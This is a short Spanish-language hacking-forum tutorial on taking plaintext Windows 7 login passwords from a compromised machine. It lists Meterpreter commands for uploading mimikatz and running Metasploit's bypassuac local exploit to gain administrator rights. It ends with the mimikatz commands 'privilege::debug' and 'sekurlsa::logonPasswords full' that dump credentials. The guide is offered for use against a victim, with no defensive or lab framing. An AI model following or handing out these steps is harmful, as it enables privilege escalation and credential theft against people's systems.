Underc0de

(http://oi57.tinypic.com/35d5jeh.jpg)

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

getsystem o también

hashdump pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:

(http://oi57.tinypic.com/23swxaw.jpg)

Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos http://blog.gentilkiwi.com/mimikatz (http://blog.gentilkiwi.com/mimikatz), lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32

(http://oi61.tinypic.com/2mze981.jpg)

ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload

(http://oi57.tinypic.com/351wqab.jpg)

lo siguiente es lanzar una shell

shell

y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.


privilege::debug
sekurlsa::logonPasswords full

Nos saldrá este error esto por el tema de privilegios

(http://oi58.tinypic.com/214qaup.jpg)

Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

background

(http://oi59.tinypic.com/2jc6dqc.jpg)

Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera


use exploit/windows/local/bypassuac
set SESSION 1
exploit

(http://oi60.tinypic.com/69ga44.jpg)

Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

sessions -i 2

nos damos cuenta que tenemos maximos privilegios con el comando

getuid

(http://oi61.tinypic.com/2lsk8ar.jpg)

Finalmente lanzamos la shell y ejecutamos mimikatz.exe

(http://oi62.tinypic.com/54ack5.jpg)

Eso es todo Saludos  :)